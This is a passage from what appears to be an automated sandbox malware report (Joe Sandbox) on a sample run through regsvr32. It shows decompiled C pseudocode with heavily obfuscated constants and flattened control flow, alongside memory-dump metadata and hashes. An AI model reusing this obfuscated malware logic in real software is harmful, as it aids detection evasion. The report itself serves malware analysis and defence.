									_t503 = 0xc9afe;
								} else {
									_t503 = 0x7227b;
									_t449 = 1;
								}
								_t384 = 0xf22d1;
								continue;
							}
							if(_t384 != 0x44d61) {
								goto L36;
							}
							_v308 = 0x5fdcc;
							_t504 = 0;
							_v308 = _v308 * 0x3c;
							_v308 = _v308 ^ 0x01684293;
							_v316 = 0x898822;
							_v316 = _v316 << 0xe;
							_v316 = _v316 + 0xa6f4;
							_v316 = _v316 * 0x64;
							_v316 = _v316 ^ 0x4b996f24;
							_v304 = 0xebd8fd;
							_v304 = _v304 * 0x68;
							_v304 = _v304 | 0xaf64b47e;
							_v304 = _v304 ^ 0xffffa4bf;
							_v312 = 0xa4019a;
							_v312 = _v312 * 0x22;
							_v312 = _v312 + 0x1d91;
							_v312 = _v312 ^ 0x15c0a598;
							E04F6E8B9(_v308, _v316, 0x100, _v304, _v312,  &_v260);
							_t507 =  &(_t507[4]);
							_v276 = 0;
							_v272 = 0;
							_t384 = 0x24a29;
							_v284 = 0;
							_v280 = 0;
						}
						__eflags = _t384 - 0xa74d0;
						if(_t384 == 0xa74d0) {
							_v296 = 0x59984d;
							_v296 = _v296 + 0x6f36;
							_v296 = _v296 ^ 0x0055adc6;
							_v300 = 0x3bec7e;
							_v300 = _v300 + 0xffff7399;
							_v300 = _v300 ^ 0x003615d9;
							_v312 = 0xcb88df;
							_v312 = _v312 >> 1;
							_v312 = _v312 ^ 0xd369a1ba;
							_v312 = _v312 ^ 0xd3003f4e;
							_v292 = 0x323657;
							_v292 = _v292 * 0x73;
							_v292 = _v292 + 0xffff60b3;
							_v292 = _v292 ^ 0x168f37c7;
							_v308 = 0x711255;
							_v308 = _v308 >> 0xf;
							_v308 = _v308 ^ 0x09185d7e;
							_v308 = _v308 ^ 0x091538b2;
							_t386 =  *0x4f82214; // 0x0
							_t390 =  *0x4f82214; // 0x0
							_t394 =  *0x4f82214; // 0x0
							_t397 = E04F65D99(_v296,  &_v276, _t504, _v300,  *((intOrPtr*)(_t394 + 4)) + 0x28, _v312,  &_v268,  *( *((intOrPtr*)(_t390 + 4)) + 0x18) & 0x0000ffff,  &_v260, _v292,  *( *((intOrPtr*)(_t386 + 4)) + 0x20) & 0x0000ffff, _v308);
							_t507 =  &(_t507[0xa]);
							__eflags = _t397;
							if(__eflags == 0) {
								_t503 = 0xc9afe;
								_t384 = 0x566d9;
								goto L36;
							}
							_t384 = 0x2c329;
							goto L2;
						}
						__eflags = _t384 - 0xc64e2;
						if(_t384 == 0xc64e2) {
							_v308 = 0x5d73a3;
							_v308 = _v308 << 0xc;
							_v308 = _v308 ^ 0xbe584357;
							_v308 = _v308 ^ 0x69627757;
							_t336 =  &_v308; // 0x69627757
							__eflags = _v280 -  *_t336;
							if(_v280 >=  *_t336) {
								_t400 = E04F6E942( &_v284,  &_v276);
							} else {
								_t400 = E04F7B45C( &_v284);
							}
							_t504 = _t400;
							__eflags = _t400;
							if(__eflags == 0) {
								_t384 = 0x566d9;
								_t503 = 0x7227b;
							} else {
								_t384 = 0x16263;
							}
							goto L2;
						}
						__eflags = _t384 - 0xc9afe;
						if(_t384 == 0xc9afe) {
							goto L22;
						}
						__eflags = _t384 - 0xf22d1;
						if(__eflags != 0) {
							goto L36;
						}
						_v312 = 0x5bd759;
						_v312 = _v312 + 0x3aeb;
						_t460 = 0x42;
						_v312 = _v312 / _t460;
						_v312 = _v312 + 0xffffeeae;
						_v312 = _v312 ^ 0x000242f3;
						_v316 = 0xe07bb;
						_v316 = _v316 | 0xd37660e8;
						_t461 = 0x77;
						_v316 = _v316 / _t461;
						_v316 = _v316 + 0xce6c;
						_v316 = _v316 ^ 0x01c2fdb0;
						_v304 = 0x82615c;
						_v304 = _v304 >> 0xc;
						_v304 = _v304 + 0x8475;
						_v304 = _v304 << 5;
						_v304 = _v304 ^ 0x00135fc0;
						E04F7E4B2(_v312, _v316, __eflags, _v304, _v268);
						_t384 = 0x566d9;
						goto L2;
						L36:
						__eflags = _t384 - 0x7227b;
					} while (__eflags != 0);
					goto L26;
					L22:
					_t454 =  *0x4f82214; // 0x0
					_t402 =  *((intOrPtr*)( *((intOrPtr*)(_t454 + 4)) + 0xc));
					 *_t454 =  *_t454 + 1;
					_t497 =  *_t454;
					 *((intOrPtr*)(_t454 + 4)) = _t402;
					__eflags = _t402;
					if(_t402 == 0) {
						 *((intOrPtr*)(_t454 + 4)) =  *((intOrPtr*)(_t454 + 0x1c));
					}
					_t403 =  *0x4f82214; // 0x0
					__eflags = _t497 -  *((intOrPtr*)(_t403 + 0xc));
				} while (__eflags < 0);
				 *_t403 = 0;
				goto L26;
			}

0x04f61d66
0x04f61d6d
0x04f61d74
0x04f61d7b
0x04f61d82
0x04f61d89
0x04f61d90
0x04f61d91
0x04f61d92
0x04f61d97
0x04f61d9a
0x04f61da2
0x04f61dac
0x04f61db0
0x04f61db2
0x04f61db6
0x04f61db6
0x04f61db6
0x04f61dbb
0x04f61dbb
0x04f61dbb
0x04f61dbb
0x04f61dc0
0x00000000
0x00000000
0x04f61dc6
0x04f62191
0x04f62199
0x04f6219e
0x04f621a6
0x04f621b3
0x04f621b7
0x04f621bf
0x04f621c7
0x04f621cf
0x04f621d7
0x04f621df
0x04f621f7
0x04f621fc
0x04f6220c
0x04f62210
0x04f62214
0x04f6221c
0x04f62224
0x04f6222c
0x04f62234
0x04f6223c
0x04f62244
0x04f6224c
0x04f62260
0x04f62265
0x04f6226f
0x04f6227e
0x04f6227f
0x04f62283
0x04f6228b
0x04f62293
0x04f622a1
0x04f622a5
0x04f622ad
0x04f622b5
0x04f622bd
0x04f622c2
0x04f622ca
0x04f622e2
0x04f622e7
0x04f622ea
0x00000000
0x04f622ea
0x04f61dd1
0x04f61fd3
0x04f61fe3
0x04f61fe8
0x04f61ff2
0x04f61ff5
0x04f61ff6
0x04f61ffa
0x04f62002
0x04f6200a
0x04f6200f
0x04f62017
0x04f6201f
0x04f62027
0x04f6202f
0x04f62037
0x04f6203f
0x04f62047
0x04f6204f
0x04f62057
0x04f62064
0x04f62068
0x04f62085
0x04f6208a
0x04f6209e
0x04f620a7
0x04f620ab
0x04f620b3
0x04f620c3
0x04f620c7
0x04f620cc
0x04f620d4
0x04f620dc
0x04f620e4
0x04f620e9
0x04f620f1
0x04f620f9
0x04f62101
0x04f62109
0x04f62111
0x04f62119
0x04f62121
0x04f62129
0x04f62131
0x04f62136
0x04f6213b
0x04f62143
0x04f6214b
0x04f62150
0x04f62155
0x04f62169
0x04f6216a
0x04f6216e
0x04f62172
0x04f62173
0x04f6217f
0x04f62184
0x04f62187
0x00000000
0x04f62187
0x04f61ddc
0x04f61f58
0x04f61f60
0x04f61f74
0x04f61f7c
0x04f61f84
0x04f61f8c
0x04f61f94
0x04f61f9c
0x04f61fa1
0x04f61fb9
0x04f61fbe
0x04f61fc1
0x04f61fc3
0x04f623f0
0x04f623f9
0x04f623f9
0x04f61fc9
0x00000000
0x04f61fc9
0x04f61de7
0x04f61eb7
0x04f61ec1
0x04f61ec9
0x04f61ece
0x04f61ed6
0x04f61ede
0x04f61ee6
0x04f61ef5
0x04f61efd
0x04f61f01
0x04f61f09
0x04f61f1b
0x04f61f1f
0x04f61f33
0x04f61f38
0x04f61f3b
0x04f61f3d
0x04f61f49
0x04f61f3f
0x04f61f41
0x04f61f46
0x04f61f46
0x04f61f4e
0x00000000
0x04f61f4e
0x04f61df2
0x00000000
0x00000000
0x04f61df8
0x04f61e00
0x04f61e07
0x04f61e0b
0x04f61e13
0x04f61e1b
0x04f61e20
0x04f61e2d
0x04f61e31
0x04f61e39
0x04f61e46
0x04f61e4a
0x04f61e52
0x04f61e5a
0x04f61e67
0x04f61e6f
0x04f61e77
0x04f61e95
0x04f61e9a
0x04f61e9d
0x04f61ea1
0x04f61ea5
0x04f61eaa
0x04f61eae
0x04f61eae
0x04f622f1
0x04f622f6
0x04f62454
0x04f62460
0x04f62468
0x04f62470
0x04f62478
0x04f62480
0x04f62488
0x04f62490
0x04f62494
0x04f6249c
0x04f624a4
0x04f624b1
0x04f624b5
0x04f624bd
0x04f624c5
0x04f624cd
0x04f624d2
0x04f624da
0x04f624e6
0x04f624fc
0x04f62512
0x04f62527
0x04f6252c
0x04f6252f
0x04f62531
0x04f6253d
0x04f62542
0x00000000
0x04f62542
0x04f62533
0x00000000
0x04f62533
0x04f622fc
0x04f62301
0x04f623fa
0x04f62406
0x04f6240b
0x04f62413
0x04f6241f
0x04f6241f
0x04f62423
0x04f62430
0x04f62425
0x04f62425
0x04f62425
0x04f62435
0x04f62437
0x04f62439
0x04f62445
0x04f6244a
0x04f6243b
0x04f6243b
0x04f6243b
0x00000000
0x04f62439
0x04f62307
0x04f6230c
0x00000000
0x00000000
0x04f62312
0x04f62317
0x00000000
0x00000000
0x04f6231d
0x04f62327
0x04f62335
0x04f6233a
0x04f62340
0x04f62348
0x04f62350
0x04f62358
0x04f62364
0x04f62367
0x04f6236b
0x04f62373
0x04f6237b
0x04f62383
0x04f62388
0x04f62390
0x04f62395
0x04f623ad
0x04f623b4
0x00000000
0x04f62547
0x04f62547
0x04f62547
0x00000000
0x04f623be
0x04f623be
0x04f623c7
0x04f623ca
0x04f623cc
0x04f623ce
0x04f623d1
0x04f623d3
0x04f623d8
0x04f623d8
0x04f623db
0x04f623e0
0x04f623e0
0x04f623eb
0x00000000

Strings

N?, xrefs: 04F6249C
Wwbi, xrefs: 04F6241F
6o, xrefs: 04F62460
dRZ, xrefs: 04F62143
#, xrefs: 04F61DA2
~;, xrefs: 04F62470
W62, xrefs: 04F624A4

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #$6o$N?$W62$Wwbi$dRZ$~;
API String ID: 0-994308873
Opcode ID: f91a942fec60155b00e723788ef98ac6b53d6361b586385e28652b1925be4ca4
Instruction ID: 13f52c2f68985423c6e5fa66f7d269ab10f99c6d4b640c62e0e3e9351707ff08
Opcode Fuzzy Hash: f91a942fec60155b00e723788ef98ac6b53d6361b586385e28652b1925be4ca4
Instruction Fuzzy Hash: F51214715083429FC358CF25D58981BBBE1FBC8748F408A1DF496A6260D3B5EA4ACF97

Uniqueness

Uniqueness Score: -1.00%

Function 04F7169D Relevance: 9.1, Strings: 7, Instructions: 357
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E04F7169D(intOrPtr* __ecx, signed int __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v520;
				char _v1040;
				short _v1584;
				short _v1586;
				char _v1588;
				signed int _v1632;
				intOrPtr _v1668;
				char _v1672;
				signed int _v1676;
				intOrPtr _v1680;
				intOrPtr _v1684;
				intOrPtr* _v1688;
				unsigned int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				void* _t342;
				signed int _t344;
				signed int _t350;
				signed int _t352;
				void* _t353;
				signed int _t359;
				signed int _t362;
				void* _t371;
				intOrPtr _t385;
				signed int _t387;
				intOrPtr* _t391;
				signed int _t392;
				signed int _t397;
				signed int _t398;
				signed int _t402;
				signed int _t403;
				signed int _t405;
				void* _t410;
				signed int _t438;
				void* _t439;
				void* _t440;

				_t385 = _a16;
				_push(_a20);
				_t438 = __edx;
				_v1688 = __ecx;
				_push(_t385);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04F732C4(_t342);
				_t435 = _v1700;
				_t440 = _t439 + 0x1c;
				_v1676 = _v1676 & 0x00000000;
				_t344 = 0x97ca6;
				_v1684 = 0xd69eb;
				_v1680 = 0xac761;
				while(1) {
					L1:
					_t410 = 0x2e;
					while(_t344 != 0x49d77) {
						if(_t344 == 0x62907) {
							_v1708 = 0x784b62;
							_v1708 = _v1708 >> 0xd;
							_v1708 = _v1708 ^ 0x000e678b;
							_v1696 = 0xf69a0c;
							_v1696 = _v1696 ^ 0x6d475341;
							_v1696 = _v1696 ^ 0x6db70fce;
							_v1700 = 0x5ffecc;
							_t392 = 0x4b;
							_v1700 = _v1700 / _t392;
							_v1700 = _v1700 ^ 0x000d83f8;
							_t350 = E04F7C56F( &_v1632, _v1708, _v1696, _v1700, _t435);
							_t440 = _t440 + 0xc;
							asm("sbb eax, eax");
							_t352 =  ~_t350 & 0x0007c3d7;
							L20:
							_t344 = _t352 + 0x49d77;
							L10:
							_t391 = _v1688;
							goto L1;
						}
						if(_t344 == 0x97ca6) {
							_v1668 = _t385;
							_t344 = 0xb8031;
							continue;
						}
						if(_t344 == 0xb8031) {
							_v1704 = 0x52d890;
							_v1704 = _v1704 ^ 0xb1e0aa46;
							_v1704 = _v1704 | 0xa00fc35e;
							_v1704 = _v1704 ^ 0xb1bee4e0;
							_v1696 = 0x4d542f;
							_v1696 = _v1696 + 0xffff1da7;
							_v1696 = _v1696 ^ 0x00485365;
							_v1708 = 0xb4f39e;
							_v1708 = _v1708 >> 0x10;
							_v1708 = _v1708 + 0xc78;
							_v1708 = _v1708 ^ 0x0003d8e5;
							_v1700 = 0x84d36d;
							_v1700 = _v1700 ^ 0x5469dbff;
							_v1700 = _v1700 ^ 0x54e68449;
							_t228 =  &_v1696; // 0xd69eb
							_t353 = E04F7D6A7(_v1704,  *_t228, _v1708, 0x4f611a4, _v1700);
							_v1704 = 0x994d2e;
							_v1704 = _v1704 << 7;
							_v1704 = _v1704 ^ 0x4ca3331f;
							_v1708 = 0x5a14bd;
							_v1708 = _v1708 + 0xfffffe6f;
							_v1708 = _v1708 + 0xc70e;
							_v1708 = _v1708 ^ 0x005f623f;
							_v1696 = 0x8e5c24;
							_v1696 = _v1696 | 0xa01613a4;
							_v1696 = _v1696 ^ 0xa09bca9b;
							_v1700 = 0xc1ccf5;
							_v1700 = _v1700 << 0xb;
							_v1700 = _v1700 ^ 0x0e6bc462;
							E04F79E2F(_v1708, __eflags,  &_v520, _t353, _v1696, _t385, _v1704, _v1700);
							_v1696 = 0xaf3962;
							_v1696 = _v1696 + 0xffff5de0;
							_v1696 = _v1696 ^ 0x00ae7f7e;
							_v1704 = 0x9c64ce;
							_v1704 = _v1704 << 0xd;
							_v1704 = _v1704 * 0x5e;
							_v1704 = _v1704 ^ 0xa07b4d5e;
							_v1708 = 0xed07f4;
							_v1708 = _v1708 + 0x4e;
							_v1708 = _v1708 * 0x6f;
							_v1708 = _v1708 | 0xc4754a6c;
							_v1708 = _v1708 ^ 0xe6f7eb44;
							_v1700 = 0xa5dc4f;
							_v1700 = _v1700 ^ 0x51617c83;
							_v1700 = _v1700 ^ 0x51c2bfc8;
							E04F6845B(_v1696, _v1704, _v1708, _v1700, _t353);
							_t440 = _t440 + 0x30;
							_t344 = 0xf77b5;
							goto L10;
						}
						if(_t344 == 0xc614e) {
							_v1708 = 0x3673ba;
							_v1708 = _v1708 + 0xffff772e;
							_v1708 = _v1708 ^ 0x0035eaf8;
							_t359 = _v1708;
							__eflags = _v1632 & _t359;
							if((_v1632 & _t359) == 0) {
								_t362 =  *_t391( &_v1632,  &_v1672);
								asm("sbb eax, eax");
								_t352 =  ~_t362 & 0x00018b90;
								__eflags = _t352;
								goto L20;
							}
							__eflags = _v1588 - _t410;
							if(_v1588 != _t410) {
								L17:
								__eflags = _t438;
								if(_t438 != 0) {
									_v1704 = 0x26b5a9;
									_v1704 = _v1704 << 0xe;
									_v1704 = _v1704 | 0xa02e93f9;
									_v1704 = _v1704 ^ 0xad6f2b7f;
									_v1696 = 0xa2a55e;
									_t402 = 0x6c;
									_v1696 = _v1696 * 0x16;
									_v1696 = _v1696 ^ 0x0df1be17;
									_v1692 = 0xb40d0b;
									_v1692 = _v1692 | 0xc12a0c88;
									_t403 = 0x58;
									_v1692 = _v1692 / _t402;
									_v1692 = _v1692 * 0x2e;
									_v1692 = _v1692 ^ 0x5288d2d4;
									_v1708 = 0x172331;
									_v1708 = _v1708 / _t403;
									_v1708 = _v1708 ^ 0x000c32a1;
									_t371 = E04F7D6A7(_v1704, _v1696, _v1692, 0x4f61184, _v1708);
									_v1700 = 0xd22c4d;
									_v1700 = _v1700 + 0x2868;
									_v1700 = _v1700 ^ 0x00d8220e;
									_v1696 = 0x8a5e50;
									_v1696 = _v1696 >> 0xd;
									_v1696 = _v1696 ^ 0x00001a34;
									_v1708 = 0x99559f;
									_v1708 = _v1708 << 9;
									_v1708 = _v1708 | 0xd45f4ccc;
									_v1708 = _v1708 + 0x93cb;
									_v1708 = _v1708 ^ 0xf709f3cb;
									_v1704 = 0xa43fee;
									_t405 = 0x57;
									_v1704 = _v1704 / _t405;
									_v1704 = _v1704 + 0x2fd2;
									_v1704 = _v1704 >> 4;
									_v1704 = _v1704 ^ 0x000c6447;
									_v1692 = 0x9c05ea;
									_v1692 = _v1692 | 0x133d2ea6;
									_v1692 = _v1692 + 0xffff9845;
									_v1692 = _v1692 ^ 0x2b4b64e6;
									_v1692 = _v1692 ^ 0x38fa5375;
									E04F736BB(_t385, __eflags, _t405, _v1696,  &_v1588, _v1708, _v1704, _t371, _v1692,  &_v1040);
									_v1700 = 0x162bf3;
									_v1700 = _v1700 | 0x36f9337f;
									_v1700 = _v1700 ^ 0x36f2b62f;
									_v1704 = 0x1b2e6;
									_v1704 = _v1704 ^ 0x5c7674c0;
									_v1704 = _v1704 + 0x88a5;
									_v1704 = _v1704 ^ 0x5c76d743;
									_v1708 = 0x150103;
									_v1708 = _v1708 * 0x76;
									_v1708 = _v1708 | 0x72e3869a;
									_v1708 = _v1708 ^ 0x7becf40b;
									E04F7169D(_v1688, _t438, _v1700, _v1704, _a12,  &_v1040, _v1708);
									_v1696 = 0x458f27;
									_v1696 = _v1696 + 0x5200;
									_v1696 = _v1696 ^ 0x004303b3;
									_v1700 = 0xe20451;
									_v1700 = _v1700 >> 0xf;
									_v1700 = _v1700 ^ 0x000e3e38;
									_v1704 = 0x6346de;
									_v1704 = _v1704 ^ 0x6f5d7004;
									_v1704 = _v1704 ^ 0x83934805;
									_v1704 = _v1704 | 0xb20e9670;
									_v1704 = _v1704 ^ 0xfead2fcb;
									_v1708 = 0x1171ad;
									_v1708 = _v1708 ^ 0x534af47a;
									_v1708 = _v1708 + 0xffffa741;
									_v1708 = _v1708 | 0xd6e98541;
									_v1708 = _v1708 ^ 0xd7f0bb49;
									E04F6845B(_v1696, _v1700, _v1704, _v1708, _t371);
									_t391 = _v1688;
									_t440 = _t440 + 0x4c;
									_t410 = 0x2e;
								}
								L16:
								_t344 = 0x62907;
								continue;
							}
							__eflags = _v1586;
							if(_v1586 == 0) {
								goto L16;
							}
							__eflags = _v1586 - _t410;
							if(_v1586 != _t410) {
								goto L17;
							}
							__eflags = _v1584;
							if(_v1584 != 0) {
								goto L17;
							}
							goto L16;
						}
						if(_t344 != 0xf77b5) {
							L25:
							__eflags = _t344 - 0x79a7e;
							if(_t344 != 0x79a7e) {
								continue;
							}
							L26:
							return _t344;
						}
						_v1708 = 0x2b07d0;
						_v1708 = _v1708 | 0xe4b932c4;
						_v1708 = _v1708 >> 0xc;
						_v1708 = _v1708 ^ 0x000d3fba;
						_v1692 = 0xca0871;
						_v1692 = _v1692 | 0x42809c99;
						_t397 = 0x72;
						_v1692 = _v1692 / _t397;
						_t398 = 0x51;
						_v1692 = _v1692 / _t398;
						_v1692 = _v1692 ^ 0x0001378a;
						_t344 = E04F61B61( &_v520,  &_v1632, _v1708, _v1692);
						_t435 = _t344;
						if(_t344 == 0xffffffff) {
							goto L26;
						}
						_t344 = 0xc614e;
						goto L10;
					}
					_v1708 = 0xf0662;
					_v1708 = _v1708 << 1;
					_v1708 = _v1708 ^ 0xcc6b179e;
					_v1708 = _v1708 >> 2;
					_v1708 = _v1708 ^ 0x3317fd60;
					_v1692 = 0xb0427a;
					_v1692 = _v1692 >> 1;
					_v1692 = _v1692 >> 6;
					_v1692 = _v1692 ^ 0x0008a15e;
					_v1704 = 0xd5ee07;
					_t387 = 0x29;
					_v1704 = _v1704 / _t387;
					_v1704 = _v1704 + 0xffff1760;
					_t336 =  &_v1704;
					 *_t336 = _v1704 ^ 0x000f696b;
					__eflags =  *_t336;
					_t339 =  &_v1692; // 0xd69eb
					E04F78B54(_v1708,  *_t339, _v1704, _t435);
					_t391 = _v1688;
					_t344 = 0x79a7e;
					_t410 = 0x2e;
					goto L25;
				}
			}

0x04f716a4
0x04f716ae
0x04f716b5
0x04f716b7
0x04f716bb
0x04f716bc
0x04f716c3
0x04f716ca
0x04f716d1
0x04f716d2
0x04f716d3
0x04f716d8
0x04f716dc
0x04f716df
0x04f716e4
0x04f716e9
0x04f716f1
0x04f716f9
0x04f716f9
0x04f716fb
0x04f716fc
0x04f7170c
0x04f71c97
0x04f71ca1
0x04f71ca6
0x04f71cae
0x04f71cb6
0x04f71cbe
0x04f71cc6
0x04f71cd4
0x04f71cd8
0x04f71ce0
0x04f71cf4
0x04f71cf9
0x04f71cfe
0x04f71d00
0x04f71ada
0x04f71ada
0x04f717bb
0x04f717bb
0x00000000
0x04f717bb
0x04f71717
0x04f71c89
0x04f71c8d
0x00000000
0x04f71c8d
0x04f71722
0x04f71ae4
0x04f71aec
0x04f71af4
0x04f71afc
0x04f71b04
0x04f71b0c
0x04f71b14
0x04f71b1c
0x04f71b24
0x04f71b29
0x04f71b31
0x04f71b39
0x04f71b41
0x04f71b49
0x04f71b5e
0x04f71b66
0x04f71b6b
0x04f71b76
0x04f71b7d
0x04f71b8c
0x04f71b94
0x04f71b9c
0x04f71ba4
0x04f71bac
0x04f71bb4
0x04f71bbc
0x04f71bc4
0x04f71bcc
0x04f71bd1
0x04f71bed
0x04f71bf2
0x04f71bfa
0x04f71c02
0x04f71c0a
0x04f71c12
0x04f71c1d
0x04f71c21
0x04f71c29
0x04f71c31
0x04f71c3b
0x04f71c3f
0x04f71c47
0x04f71c4f
0x04f71c57
0x04f71c5f
0x04f71c77
0x04f71c7c
0x04f71c7f
0x00000000
0x04f71c7f
0x04f7172d
0x04f717c4
0x04f717cc
0x04f717d4
0x04f717dc
0x04f717e0
0x04f717e4
0x04f71acf
0x04f71ad3
0x04f71ad5
0x04f71ad5
0x00000000
0x04f71ad5
0x04f717ea
0x04f717f2
0x04f7181e
0x04f7181e
0x04f71820
0x04f71822
0x04f7182c
0x04f71831
0x04f71839
0x04f71841
0x04f71850
0x04f71853
0x04f71857
0x04f7185f
0x04f71867
0x04f71875
0x04f71876
0x04f71881
0x04f71885
0x04f7188d
0x04f718a3
0x04f718a7
0x04f718c4
0x04f718c9
0x04f718d4
0x04f718de
0x04f718e8
0x04f718f0
0x04f718f5
0x04f718fd
0x04f71905
0x04f7190a
0x04f71912
0x04f7191a
0x04f71922
0x04f71930
0x04f71935
0x04f71940
0x04f71948
0x04f7194d
0x04f71955
0x04f7195d
0x04f71965
0x04f7196d
0x04f71975
0x04f7199c
0x04f719a1
0x04f719a9
0x04f719b1
0x04f719b9
0x04f719c1
0x04f719c9
0x04f719d3
0x04f719db
0x04f719ec
0x04f719f7
0x04f719ff
0x04f71a1b
0x04f71a20
0x04f71a2b
0x04f71a33
0x04f71a3b
0x04f71a43
0x04f71a48
0x04f71a50
0x04f71a58
0x04f71a60
0x04f71a68
0x04f71a70
0x04f71a78
0x04f71a80
0x04f71a88
0x04f71a90
0x04f71a98
0x04f71ab1
0x04f71ab6
0x04f71aba
0x04f71abf
0x04f71abf
0x04f71814
0x04f71814
0x00000000
0x04f71814
0x04f717f4
0x04f717fd
0x00000000
0x00000000
0x04f717ff
0x04f71807
0x00000000
0x00000000
0x04f71809
0x04f71812
0x00000000
0x00000000
0x00000000
0x04f71812
0x04f71738
0x04f71d8b
0x04f71d8b
0x04f71d90
0x00000000
0x00000000
0x04f71da0
0x04f71da0
0x04f71da0
0x04f7173e
0x04f71748
0x04f71750
0x04f71755
0x04f7175d
0x04f71765
0x04f71773
0x04f71778
0x04f71782
0x04f71789
0x04f71794
0x04f717a4
0x04f717a9
0x04f717b0
0x00000000
0x00000000
0x04f717b6
0x00000000
0x04f717b6
0x04f71d0a
0x04f71d14
0x04f71d18
0x04f71d20
0x04f71d25
0x04f71d2d
0x04f71d35
0x04f71d39
0x04f71d3e
0x04f71d46
0x04f71d54
0x04f71d58
0x04f71d5c
0x04f71d64
0x04f71d64
0x04f71d64
0x04f71d70
0x04f71d78
0x04f71d7f
0x04f71d83
0x04f71d8a
0x00000000
0x04f71d8a

Strings

h(, xrefs: 04F718D4
dK+, xrefs: 04F7196D
i, xrefs: 04F718B8, 04F718BC
N, xrefs: 04F71C31
i, xrefs: 04F71B5E
bKx, xrefs: 04F71C97
ASGm, xrefs: 04F71CB6

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ASGm$N$bKx$h($dK+$i$i
API String ID: 0-634052012
Opcode ID: 99e51da23cc9528c1bc95e5f0c2c6a6c1e015d15b772693d927a87b0650a56ec
Instruction ID: 3645db4a74de4a77ac7f2ba3bedaff1551094d15756cdbebe7a853e7e786fb47
Opcode Fuzzy Hash: 99e51da23cc9528c1bc95e5f0c2c6a6c1e015d15b772693d927a87b0650a56ec
Instruction Fuzzy Hash: 5D0235715093419BD358CF20D68A90BBBE1FBD8748F104A1EF086A6260D7B5DA49CF97

Uniqueness

Uniqueness Score: -1.00%

Function 10005B60 Relevance: 9.1, APIs: 6, Instructions: 67
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E10005B60(void* __ecx) {
				int _v84;
				char _v88;
				struct tagRECT _v104;
				void* __esi;
				int _t15;
				int _t19;
				int _t20;
				void* _t55;

				_t55 = __ecx;
				_t15 = IsIconic( *(__ecx + 0x1c));
				_t57 = _t15;
				if(_t15 == 0) {
					return E1001EBC6(_t55, _t55, __eflags);
				} else {
					_push(_t55);
					E10024FA0( &_v84, _t57);
					SendMessageA( *(_t55 + 0x1c), 0x27, _v84, 0);
					_t19 = GetSystemMetrics(0xb);
					_t20 = GetSystemMetrics(0xc);
					GetClientRect( *(_t55 + 0x1c),  &_v104);
					asm("cdq");
					asm("cdq");
					DrawIcon(_v84, _v104.right - _v104.left - _t19 + 1 - _v104.left >> 1, _v104.bottom - _v104.top - _t20 + 1 -  *(_t55 + 0xa50) >> 1,  *(_t55 + 0xa50));
					return E10024FFB( &_v88);
				}
			}

0x10005b64
0x10005b6a
0x10005b70
0x10005b72
0x10005c0b
0x10005b78
0x10005b7a
0x10005b7f
0x10005b91
0x10005b9f
0x10005ba5
0x10005bb2
0x10005bcc
0x10005bdf
0x10005bea
0x10005bff
0x10005bff

APIs

IsIconic.USER32 ref: 10005B6A

Part of subcall function 10024FA0: __EH_prolog.LIBCMT ref: 10024FA5
Part of subcall function 10024FA0: BeginPaint.USER32(?,?,?,?,1001EBE7), ref: 10024FD3

SendMessageA.USER32 ref: 10005B91
GetSystemMetrics.USER32 ref: 10005B9F
GetSystemMetrics.USER32 ref: 10005BA5
GetClientRect.USER32 ref: 10005BB2
DrawIcon.USER32 ref: 10005BEA

Part of subcall function 10024FFB: __EH_prolog.LIBCMT ref: 10025000
Part of subcall function 10024FFB: EndPaint.USER32(?,?,?,?,1001EC0D,?), ref: 1002501D

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: H_prologMetricsPaintSystem$BeginClientDrawIconIconicMessageRectSend
String ID:
API String ID: 1530917984-0
Opcode ID: 0f3b34dff056d5210852d9607477652bce15868df9d995af9a900628968c819f
Instruction ID: 5182488d2048b35cba8559b18d63d6b76633b9c37917e021af1092b9d80c7efe
Opcode Fuzzy Hash: 0f3b34dff056d5210852d9607477652bce15868df9d995af9a900628968c819f
Instruction Fuzzy Hash: 79116AB52047119FD228DF3CDD89E6B77EDEBC8310F554A28F586C3284DA30F90A8A61

Uniqueness

Uniqueness Score: -1.00%

Function 10021590 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E10021590(void* __ebp, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v0;
				intOrPtr _v4;
				struct HINSTANCE__* _t16;
				_Unknown_base(*)()* _t18;
				void* _t21;

				E100286A3(0xc);
				_push(E10027DD4);
				_t21 = E10028345(0x10039b44);
				if( *(_t21 + 8) != 0) {
					L5:
					E10028706(0xc);
					return  *(_t21 + 8)(_v4, _v0, _a4, _a8);
				}
				_t16 = LoadLibraryA("hhctrl.ocx");
				 *(_t21 + 4) = _t16;
